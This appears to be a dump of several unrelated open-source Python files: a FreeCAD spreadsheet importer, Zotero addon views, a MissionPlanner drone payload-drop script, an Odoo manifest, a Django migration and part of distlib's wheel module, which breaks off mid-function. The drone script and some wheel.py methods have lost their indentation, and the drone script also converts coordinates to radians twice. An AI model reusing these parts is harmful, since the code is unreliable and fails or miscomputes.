            # aliasRef looks like "Sheet1!$A$1": split into sheet and cell.
            refList = aliasRef.split('!$')
            adressList = refList[1].split('$')
            #print("aliasRef: ", aliasRef)
            #print('Sheet Name: ', refList[0])
            #print('Adress: ', adressList[0] + adressList[1])
            actSheet, sheetFile = sheetDict[refList[0]]
            actSheet.setAlias(adressList[0]+adressList[1], aliasName.encode('utf8'))
def handleStrings(theStr, sList):
    """Append every shared string found in the DOM *theStr* to *sList*."""
    print('process Strings: ')
    for stringElement in theStr.getElementsByTagName('t'):
        text = getText(stringElement.childNodes)
        print('string: ', text)
        sList.append(text)
def open(nameXLSX):
    """FreeCAD importer entry point: import *nameXLSX* into a new document.

    NOTE: intentionally shadows the builtin open() — this is the name the
    FreeCAD importer API requires; the builtin is preserved above as
    pythonopen.

    Returns the new FreeCAD document (or None for an empty file name).
    """
    if len(nameXLSX) > 0:
        z=zipfile.ZipFile(nameXLSX)
        theDoc = App.newDocument()
        sheetDict = dict()
        stringList = []
        theBookFile=z.open('xl/workbook.xml')
        theBook = xml.dom.minidom.parse(theBookFile)
        handleWorkBook(theBook, sheetDict, theDoc)
        theBook.unlink()
        # The shared-strings part is optional in the XLSX package.
        if 'xl/sharedStrings.xml' in z.namelist():
            theStringFile=z.open('xl/sharedStrings.xml')
            theStrings = xml.dom.minidom.parse(theStringFile)
            handleStrings(theStrings, stringList)
            theStrings.unlink()
        for sheetSpec in sheetDict:
            #print("sheetSpec: ", sheetSpec)
            theSheet, sheetFile = sheetDict[sheetSpec]
            f=z.open('xl/worksheets/' + sheetFile)
            myDom = xml.dom.minidom.parse(f)
            handleWorkSheet(myDom, theSheet, stringList)
            myDom.unlink()
        z.close()
        # This is needed more than once, otherwise some references are not calculated!
        theDoc.recompute()
        theDoc.recompute()
        theDoc.recompute()
        return theDoc
def insert(nameXLSX,docname):
    """FreeCAD importer entry point: import *nameXLSX* into the document
    named *docname*, creating that document when it does not exist yet.
    """
    try:
        theDoc=App.getDocument(docname)
    except NameError:
        theDoc=App.newDocument(docname)
    App.ActiveDocument = theDoc
    sheetDict = dict()
    stringList = []
    z=zipfile.ZipFile(nameXLSX)
    theBookFile=z.open('xl/workbook.xml')
    theBook = xml.dom.minidom.parse(theBookFile)
    handleWorkBook(theBook, sheetDict, theDoc)
    theBook.unlink()
    # The shared-strings part is optional in the XLSX package.
    if 'xl/sharedStrings.xml' in z.namelist():
        theStringFile=z.open('xl/sharedStrings.xml')
        theStrings = xml.dom.minidom.parse(theStringFile)
        handleStrings(theStrings, stringList)
        theStrings.unlink()
    for sheetSpec in sheetDict:
        #print("sheetSpec: ", sheetSpec)
        theSheet, sheetFile = sheetDict[sheetSpec]
        f=z.open('xl/worksheets/' + sheetFile)
        myDom = xml.dom.minidom.parse(f)
        handleWorkSheet(myDom, theSheet, stringList)
        myDom.unlink()
    z.close()
    # This is needed more than once, otherwise some references are not calculated!
    theDoc.recompute()
    theDoc.recompute()
    theDoc.recompute()
| lgpl-2.1 |
brandonPurvis/osf.io | website/addons/zotero/views.py | 8 | 3269 | # -*- coding: utf-8 -*-
from flask import request
from framework.auth.decorators import must_be_logged_in
from website.project.decorators import (
must_be_contributor_or_public,
must_have_permission,
must_not_be_registration,
must_have_addon,
)
from .provider import ZoteroCitationsProvider
@must_be_logged_in
def zotero_list_accounts_user(auth):
    """Return the list of all of the current user's authorized Zotero accounts."""
    return ZoteroCitationsProvider().user_accounts(auth.user)
@must_have_permission('write')
@must_have_addon('zotero', 'node')
def zotero_get_config(auth, node_addon, **kwargs):
    """Serialize node addon settings and relevant urls
    (see serialize_settings/serialize_urls)
    """
    provider = ZoteroCitationsProvider()
    serializer = provider.serializer(
        node_settings=node_addon,
        user_settings=auth.user.get_addon('zotero'),
    )
    settings = serializer.serialized_node_settings
    settings['validCredentials'] = provider.check_credentials(node_addon)
    return {'result': settings}
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_set_config(auth, node_addon, **kwargs):
    """Update ZoteroNodeSettings based on submitted account and folder information.

    Expects a JSON body containing 'external_list_id' and
    'external_list_name'; returns the re-serialized node settings.
    """
    provider = ZoteroCitationsProvider()
    args = request.get_json()
    external_list_id = args.get('external_list_id')
    external_list_name = args.get('external_list_name')
    provider.set_config(
        node_addon,
        auth.user,
        external_list_id,
        external_list_name,
        auth,
    )
    return {
        'result': provider.serializer(
            node_settings=node_addon,
            user_settings=auth.user.get_addon('zotero'),
        ).serialized_node_settings
    }
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_add_user_auth(auth, node_addon, **kwargs):
    """Allows for importing existing auth to ZoteroNodeSettings """
    account_id = request.get_json().get('external_account_id')
    return ZoteroCitationsProvider().add_user_auth(node_addon, auth.user, account_id)
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_remove_user_auth(auth, node_addon, **kwargs):
    """Removes auth from ZoteroNodeSettings """
    return ZoteroCitationsProvider().remove_user_auth(node_addon, auth.user)
@must_be_contributor_or_public
@must_have_addon('zotero', 'node')
def zotero_widget(node_addon, **kwargs):
    """Collects and serializes settings needed to build the widget."""
    provider = ZoteroCitationsProvider()
    return provider.widget(node_addon)
@must_be_contributor_or_public
@must_have_addon('zotero', 'node')
def zotero_citation_list(auth, node_addon, zotero_list_id=None, **kwargs):
    """Collects a listing of folders and citations based on the
    passed zotero_list_id. If zotero_list_id is `None`, then all of the
    authorizer's folders and citations are listed.
    """
    provider = ZoteroCitationsProvider()
    # 'view' query parameter filters the listing; defaults to everything.
    show = request.args.get('view', 'all')
    return provider.citation_list(node_addon, auth.user, zotero_list_id, show)
| apache-2.0 |
Chatmetaleux/MissionPlanner | Scripts/example3.py | 72 | 2556 | import sys
import math
import clr
import time
clr.AddReference("MissionPlanner")
import MissionPlanner
clr.AddReference("MissionPlanner.Utilities") # includes the Utilities class
from MissionPlanner.Utilities import Locationwp
def gps_distance(lat1, lon1, lat2, lon2):
    '''Return the great-circle distance between two points in meters.

    Coordinates are given in degrees; the haversine formula is used.
    thanks to http://www.movable-type.co.uk/scripts/latlong.html
    '''
    radius_of_earth = 6378100.0  # equatorial radius in meters
    # Use the module-level math import instead of a redundant
    # function-local "from math import ..." (math is imported at file top).
    lat1 = math.radians(lat1)
    lat2 = math.radians(lat2)
    lon1 = math.radians(lon1)
    lon2 = math.radians(lon2)
    d_lat = lat2 - lat1
    d_lon = lon2 - lon1
    a = (math.sin(0.5 * d_lat) ** 2
         + math.sin(0.5 * d_lon) ** 2 * math.cos(lat1) * math.cos(lat2))
    c = 2.0 * math.atan2(math.sqrt(a), math.sqrt(1.0 - a))
    return radius_of_earth * c
print __name__
# main program
print "Start script"

###### Mission variables ######
dist_tolerance = 15 #(m) release-distance tolerance
ber_tolerance = 45 #heading tolerance (degrees)
waypoint = 1 #desired Waypoint

###### Time delays (ms) ######
servo_delay = 50 #To be experimentally found
comm_delay = 50 #To be experimentally found

###### Other constants ######
payload_servo = 7 #5-8
gravity = 9.81  # m/s^2
target = (-35, 117.98) # gps pos of target in degrees

time.sleep(5) # wait 5 seconds before starting

print 'Starting Mission'
Script.ChangeMode("Guided") # changes mode to "Guided"
item = MissionPlanner.Utilities.Locationwp() # creating waypoint
alt = 60.000000 # altitude value (m)
Locationwp.lat.SetValue(item,target[0]) # sets latitude
Locationwp.lng.SetValue(item,target[1]) # sets longitude
Locationwp.alt.SetValue(item,alt) # sets altitude
print 'Drop zone set'
MAV.setGuidedModeWP(item) # tells UAV "go to" the set lat/long @ alt
print 'Going to DZ'
Good = True
while Good == True:
ground_speed = cs.groundspeed
alt = cs.alt
wp_dist = gps_distance(cs.lat ,cs.lng, math.radians(target[0]), math.radians(target[1]))
print wp_dist
ber_error = cs.ber_error
fall_time = ((2 * alt) / gravity) ** (0.5)
fall_dist = ground_speed * fall_time
release_time = fall_time + (servo_delay/1000) + (comm_delay/1000)
release_dist = release_time * ground_speed
if (math.fabs(release_dist - wp_dist) <= dist_tolerance):
if (math.fabs(ber_error) <= ber_tolerance):
######Payload Release######
Script.SendRC(payload_servo,1900,True)
print 'Bombs away!'
else:
print 'Heading outside of threshold, go around!'
Good = False
else:
print 'Outside of threshold!'
time.sleep (1.0) #sleep for a second
#Broken out of the loop as Bearing was not right
print 'Bearing was out of tolerance for the Drop - Start run again'
| gpl-3.0 |
Drooids/odoo | addons/analytic/__openerp__.py | 302 | 1891 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest: metadata dictionary read by the module loader.
{
    'name' : 'Analytic Accounting',
    'version': '1.1',
    'author' : 'OpenERP SA',
    'website' : 'https://www.odoo.com/page/accounting',
    'category': 'Hidden/Dependency',
    'depends' : ['base', 'decimal_precision', 'mail'],
    'description': """
Module for defining analytic accounting object.
===============================================
In OpenERP, analytic accounts are linked to general accounts but are treated
totally independently. So, you can enter various different analytic operations
that have no counterpart in the general financial accounts.
""",
    'data': [
        'security/analytic_security.xml',
        'security/ir.model.access.csv',
        'analytic_sequence.xml',
        'analytic_view.xml',
        'analytic_data.xml',
    ],
    'demo': [],
    'installable': True,
    'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mingot/datacademy_django | datacademy/accounts/migrations/0004_auto__add_teacher__del_field_datacademyprofile_favourite_snack.py | 1 | 8385 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration (auto-generated): adds the Teacher model and
    removes DatacademyProfile.favourite_snack."""

    def forwards(self, orm):
        # Adding model 'Teacher'
        db.create_table(u'accounts_teacher', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('profile', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['accounts.DatacademyProfile'], unique=True)),
            ('years_experience', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
        ))
        db.send_create_signal(u'accounts', ['Teacher'])

        # Deleting field 'DatacademyProfile.favourite_snack'
        db.delete_column(u'accounts_datacademyprofile', 'favourite_snack')

    def backwards(self, orm):
        # Deleting model 'Teacher'
        db.delete_table(u'accounts_teacher')

        # Adding field 'DatacademyProfile.favourite_snack'
        db.add_column(u'accounts_datacademyprofile', 'favourite_snack',
                      self.gf('django.db.models.fields.CharField')(default='TBD.', max_length=5),
                      keep_default=False)

    # Frozen ORM state used by South to reconstruct the models at this point
    # in history; generated automatically — do not edit by hand.
    models = {
        u'accounts.datacademyprofile': {
            'Meta': {'object_name': 'DatacademyProfile'},
            'courses': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Course']", 'null': 'True', 'blank': 'True'}),
            'exercises': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Exercise']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'lectures': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Lecture']", 'null': 'True', 'blank': 'True'}),
            'linkedin_profile': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
            'short_bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
        },
        u'accounts.teacher': {
            'Meta': {'object_name': 'Teacher'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['accounts.DatacademyProfile']", 'unique': 'True'}),
            'years_experience': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
        },
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'courses.course': {
            'Meta': {'ordering': "['title']", 'object_name': 'Course'},
            'date': ('django.db.models.fields.DateField', [], {}),
            'description': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'level': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
            'short_description': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'courses.exercise': {
            'Meta': {'ordering': "['number']", 'object_name': 'Exercise'},
            'description': ('django.db.models.fields.TextField', [], {}),
            'hint': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'initial_code': ('django.db.models.fields.TextField', [], {}),
            'lecture': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['courses.Lecture']"}),
            'number': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'unit_test': ('django.db.models.fields.TextField', [], {})
        },
        u'courses.lecture': {
            'Meta': {'ordering': "['number']", 'object_name': 'Lecture'},
            'course': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['courses.Course']"}),
            'description': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'number': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
            'slides': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'video': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'video_duration': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['accounts']
schinke/solid-fortnight-ba | flask/venv/lib/python2.7/site-packages/pip/_vendor/distlib/wheel.py | 412 | 39115 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import unicode_literals
import base64
import codecs
import datetime
import distutils.util
from email import message_from_file
import hashlib
import imp
import json
import logging
import os
import posixpath
import re
import shutil
import sys
import tempfile
import zipfile
from . import __version__, DistlibException
from .compat import sysconfig, ZipFile, fsdecode, text_type, filter
from .database import InstalledDistribution
from .metadata import Metadata, METADATA_FILENAME
from .util import (FileOperator, convert_path, CSVReader, CSVWriter, Cache,
cached_property, get_cache_base, read_exports, tempdir)
from .version import NormalizedVersion, UnsupportedVersionError
logger = logging.getLogger(__name__)
# Dylib extraction cache; created lazily by Wheel._get_dylib_cache().
cache = None    # created when needed
# Two-letter implementation prefix used in compatibility tags
# (pp = PyPy, jy = Jython, ip = IronPython, cp = CPython).
if hasattr(sys, 'pypy_version_info'):
    IMP_PREFIX = 'pp'
elif sys.platform.startswith('java'):
    IMP_PREFIX = 'jy'
elif sys.platform == 'cli':
    IMP_PREFIX = 'ip'
else:
    IMP_PREFIX = 'cp'
# Undotted Python version, e.g. '27' or '34'.
VER_SUFFIX = sysconfig.get_config_var('py_version_nodot')
if not VER_SUFFIX:   # pragma: no cover
    VER_SUFFIX = '%s%s' % sys.version_info[:2]
PYVER = 'py' + VER_SUFFIX
IMPVER = IMP_PREFIX + VER_SUFFIX
# Platform tag, e.g. 'linux_x86_64' (dots/dashes normalised to underscores).
ARCH = distutils.util.get_platform().replace('-', '_').replace('.', '_')
ABI = sysconfig.get_config_var('SOABI')
if ABI and ABI.startswith('cpython-'):
    ABI = ABI.replace('cpython-', 'cp')
else:
    # No SOABI available (e.g. Windows CPython): derive an ABI tag from
    # the build-configuration flags, mirroring wheel's own logic.
    def _derive_abi():
        parts = ['cp', VER_SUFFIX]
        if sysconfig.get_config_var('Py_DEBUG'):
            parts.append('d')
        if sysconfig.get_config_var('WITH_PYMALLOC'):
            parts.append('m')
        if sysconfig.get_config_var('Py_UNICODE_SIZE') == 4:
            parts.append('u')
        return ''.join(parts)
    ABI = _derive_abi()
    del _derive_abi
# Full wheel filename: name-version[-build]-pyver-abi-arch.whl
# (multiple tags per field are '.'-separated, e.g. 'py2.py3').
FILENAME_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?
-(?P<py>\w+\d+(\.\w+\d+)*)
-(?P<bi>\w+)
-(?P<ar>\w+(\.\w+)*)
\.whl$
''', re.IGNORECASE | re.VERBOSE)
# Bare 'name-version[-build]' form accepted by Wheel(filename=...).
NAME_VERSION_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?$
''', re.IGNORECASE | re.VERBOSE)
# Shebang handling for scripts packaged in the wheel's .data/scripts dir.
SHEBANG_RE = re.compile(br'\s*#![^\r\n]*')
SHEBANG_DETAIL_RE = re.compile(br'^(\s*#!("[^"]+"|\S+))\s+(.*)$')
SHEBANG_PYTHON = b'#!python'
SHEBANG_PYTHONW = b'#!pythonw'
# Archive member paths are always POSIX-style; convert only when the
# native separator differs.
if os.sep == '/':
    to_posix = lambda o: o
else:
    to_posix = lambda o: o.replace(os.sep, '/')
class Mounter(object):
    """
    PEP 302 meta-path importer that loads C extensions contained in
    mounted wheels.
    """

    def __init__(self):
        # wheel pathname -> iterable of (extension name, library path)
        self.impure_wheels = {}
        # extension name -> library path, merged across all mounted wheels
        self.libs = {}

    def add(self, pathname, extensions):
        """Register the extensions contributed by the wheel at *pathname*."""
        self.impure_wheels[pathname] = extensions
        self.libs.update(extensions)

    def remove(self, pathname):
        """Forget the extensions contributed by the wheel at *pathname*."""
        registered = self.impure_wheels.pop(pathname)
        for name, _ in registered:
            if name in self.libs:
                del self.libs[name]

    def find_module(self, fullname, path=None):
        """Return self as the loader for known extensions, else None."""
        return self if fullname in self.libs else None

    def load_module(self, fullname):
        """Load (or return the already-imported) extension *fullname*."""
        try:
            return sys.modules[fullname]
        except KeyError:
            pass
        if fullname not in self.libs:
            raise ImportError('unable to find extension for %s' % fullname)
        module = imp.load_dynamic(fullname, self.libs[fullname])
        module.__loader__ = self
        pkg, _, _ = fullname.rpartition('.')
        if pkg:
            module.__package__ = pkg
        return module
# Single module-level importer instance shared by mount()/unmount().
_hook = Mounter()
class Wheel(object):
    """
    Class to build and install from Wheel files (PEP 427).
    """
    # Wheel spec version written to / expected in the WHEEL metadata file.
    wheel_version = (1, 1)
    # Default digest algorithm used for RECORD entries.
    hash_kind = 'sha256'
    def __init__(self, filename=None, sign=False, verify=False):
        """
        Initialise an instance using a (valid) filename.

        *filename* may be None (a dummy wheel), a bare
        'name-version[-build]' string, or a full wheel filename
        (optionally with a directory part); in the last case the
        pyver/abi/arch tags are parsed out of the name.
        """
        self.sign = sign
        self.should_verify = verify
        # Defaults for the dummy / name-version forms: pure-Python wheel.
        self.buildver = ''
        self.pyver = [PYVER]
        self.abi = ['none']
        self.arch = ['any']
        self.dirname = os.getcwd()
        if filename is None:
            self.name = 'dummy'
            self.version = '0.1'
            self._filename = self.filename
        else:
            m = NAME_VERSION_RE.match(filename)
            if m:
                info = m.groupdict('')
                self.name = info['nm']
                # Reinstate the local version separator
                self.version = info['vn'].replace('_', '-')
                self.buildver = info['bn']
                self._filename = self.filename
            else:
                # Full wheel filename, possibly with a directory part.
                dirname, filename = os.path.split(filename)
                m = FILENAME_RE.match(filename)
                if not m:
                    raise DistlibException('Invalid name or '
                                           'filename: %r' % filename)
                if dirname:
                    self.dirname = os.path.abspath(dirname)
                self._filename = filename
                info = m.groupdict('')
                self.name = info['nm']
                self.version = info['vn']
                self.buildver = info['bn']
                # Compressed tag sets, e.g. 'py2.py3' -> ['py2', 'py3'].
                self.pyver = info['py'].split('.')
                self.abi = info['bi'].split('.')
                self.arch = info['ar'].split('.')
@property
def filename(self):
"""
Build and return a filename from the various components.
"""
if self.buildver:
buildver = '-' + self.buildver
else:
buildver = ''
pyver = '.'.join(self.pyver)
abi = '.'.join(self.abi)
arch = '.'.join(self.arch)
# replace - with _ as a local version separator
version = self.version.replace('-', '_')
return '%s-%s%s-%s-%s-%s.whl' % (self.name, version, buildver,
pyver, abi, arch)
@property
def exists(self):
path = os.path.join(self.dirname, self.filename)
return os.path.isfile(path)
@property
def tags(self):
for pyver in self.pyver:
for abi in self.abi:
for arch in self.arch:
yield pyver, abi, arch
    @cached_property
    def metadata(self):
        """
        Read and return the distribution Metadata from inside the wheel.

        Raises ValueError if the expected metadata file is missing.
        """
        pathname = os.path.join(self.dirname, self.filename)
        name_ver = '%s-%s' % (self.name, self.version)
        info_dir = '%s.dist-info' % name_ver
        wrapper = codecs.getreader('utf-8')
        with ZipFile(pathname, 'r') as zf:
            wheel_metadata = self.get_wheel_metadata(zf)
            wv = wheel_metadata['Wheel-Version'].split('.', 1)
            file_version = tuple([int(i) for i in wv])
            # Wheels older than spec 1.1 keep metadata in 'METADATA';
            # newer ones use the distlib JSON metadata filename.
            if file_version < (1, 1):
                fn = 'METADATA'
            else:
                fn = METADATA_FILENAME
            try:
                metadata_filename = posixpath.join(info_dir, fn)
                with zf.open(metadata_filename) as bf:
                    wf = wrapper(bf)
                    result = Metadata(fileobj=wf)
            except KeyError:
                # zf.open raises KeyError for a missing archive member.
                raise ValueError('Invalid wheel, because %s is '
                                 'missing' % fn)
        return result
    def get_wheel_metadata(self, zf):
        """
        Parse the WHEEL file from open ZipFile *zf* and return its
        headers as a plain dict (e.g. 'Wheel-Version', 'Root-Is-Purelib').
        """
        name_ver = '%s-%s' % (self.name, self.version)
        info_dir = '%s.dist-info' % name_ver
        metadata_filename = posixpath.join(info_dir, 'WHEEL')
        with zf.open(metadata_filename) as bf:
            wf = codecs.getreader('utf-8')(bf)
            # WHEEL uses email-style 'Key: value' headers.
            message = message_from_file(wf)
        return dict(message)
    @cached_property
    def info(self):
        """Return the WHEEL metadata headers as a dict (cached)."""
        pathname = os.path.join(self.dirname, self.filename)
        with ZipFile(pathname, 'r') as zf:
            result = self.get_wheel_metadata(zf)
        return result
    def process_shebang(self, data):
        """
        Normalise the shebang of script bytes *data* to the '#!python'
        (or '#!pythonw') placeholder understood by wheel installers,
        preserving any interpreter arguments. If there is no shebang,
        one is prepended using the data's existing line-ending style.
        """
        m = SHEBANG_RE.match(data)
        if m:
            end = m.end()
            shebang, data_after_shebang = data[:end], data[end:]
            # Preserve any arguments after the interpreter
            if b'pythonw' in shebang.lower():
                shebang_python = SHEBANG_PYTHONW
            else:
                shebang_python = SHEBANG_PYTHON
            m = SHEBANG_DETAIL_RE.match(shebang)
            if m:
                args = b' ' + m.groups()[-1]
            else:
                args = b''
            shebang = shebang_python + args
            data = shebang + data_after_shebang
        else:
            # No shebang present: detect the line terminator in use so
            # the inserted line matches (\n, \r\n or bare \r).
            cr = data.find(b'\r')
            lf = data.find(b'\n')
            if cr < 0 or cr > lf:
                term = b'\n'
            else:
                if data[cr:cr + 2] == b'\r\n':
                    term = b'\r\n'
                else:
                    term = b'\r'
            data = SHEBANG_PYTHON + term + data
        return data
def get_hash(self, data, hash_kind=None):
if hash_kind is None:
hash_kind = self.hash_kind
try:
hasher = getattr(hashlib, hash_kind)
except AttributeError:
raise DistlibException('Unsupported hash algorithm: %r' % hash_kind)
result = hasher(data).digest()
result = base64.urlsafe_b64encode(result).rstrip(b'=').decode('ascii')
return hash_kind, result
    def write_record(self, records, record_path, base):
        """
        Write *records* (archive-path, digest, size triples) as a CSV
        RECORD file at *record_path*, adding the RECORD entry itself
        (with empty digest/size) relative to *base*, sorted by path.
        """
        records = list(records) # make a copy for sorting
        p = to_posix(os.path.relpath(record_path, base))
        # RECORD lists itself, but without hash or size.
        records.append((p, '', ''))
        records.sort()
        with CSVWriter(record_path) as writer:
            for row in records:
                writer.writerow(row)
def write_records(self, info, libdir, archive_paths):
records = []
distinfo, info_dir = info
hasher = getattr(hashlib, self.hash_kind)
for ap, p in archive_paths:
with open(p, 'rb') as f:
data = f.read()
digest = '%s=%s' % self.get_hash(data)
size = os.path.getsize(p)
records.append((ap, digest, size))
p = os.path.join(distinfo, 'RECORD')
self.write_record(records, p, libdir)
ap = to_posix(os.path.join(info_dir, 'RECORD'))
archive_paths.append((ap, p))
    def build_zip(self, pathname, archive_paths):
        """
        Create the wheel zip at *pathname* from *archive_paths*, a list
        of (archive path, filesystem path) pairs, using deflate
        compression.
        """
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
    def build(self, paths, tags=None, wheel_version=None):
        """
        Build a wheel from files in specified paths, and use any specified tags
        when determining the name of the wheel.

        *paths* maps location keys ('purelib' or 'platlib', plus
        optionally 'data', 'headers', 'scripts') to directories whose
        contents go into the wheel. Returns the path of the built wheel.
        """
        if tags is None:
            tags = {}
        # Exactly one of purelib/platlib is expected; it decides purity
        # and the default compatibility tags.
        libkey = list(filter(lambda o: o in paths, ('purelib', 'platlib')))[0]
        if libkey == 'platlib':
            is_pure = 'false'
            default_pyver = [IMPVER]
            default_abi = [ABI]
            default_arch = [ARCH]
        else:
            is_pure = 'true'
            default_pyver = [PYVER]
            default_abi = ['none']
            default_arch = ['any']
        self.pyver = tags.get('pyver', default_pyver)
        self.abi = tags.get('abi', default_abi)
        self.arch = tags.get('arch', default_arch)
        libdir = paths[libkey]
        name_ver = '%s-%s' % (self.name, self.version)
        data_dir = '%s.data' % name_ver
        info_dir = '%s.dist-info' % name_ver
        archive_paths = []
        # First, stuff which is not in site-packages
        for key in ('data', 'headers', 'scripts'):
            if key not in paths:
                continue
            path = paths[key]
            if os.path.isdir(path):
                for root, dirs, files in os.walk(path):
                    for fn in files:
                        p = fsdecode(os.path.join(root, fn))
                        rp = os.path.relpath(p, path)
                        ap = to_posix(os.path.join(data_dir, key, rp))
                        archive_paths.append((ap, p))
                        # Scripts get their shebangs rewritten in place
                        # (native .exe launchers are left untouched).
                        if key == 'scripts' and not p.endswith('.exe'):
                            with open(p, 'rb') as f:
                                data = f.read()
                            data = self.process_shebang(data)
                            with open(p, 'wb') as f:
                                f.write(data)
        # Now, stuff which is in site-packages, other than the
        # distinfo stuff.
        path = libdir
        distinfo = None
        for root, dirs, files in os.walk(path):
            if root == path:
                # At the top level only, save distinfo for later
                # and skip it for now
                for i, dn in enumerate(dirs):
                    dn = fsdecode(dn)
                    if dn.endswith('.dist-info'):
                        distinfo = os.path.join(root, dn)
                        del dirs[i]
                        break
                assert distinfo, '.dist-info directory expected, not found'
            for fn in files:
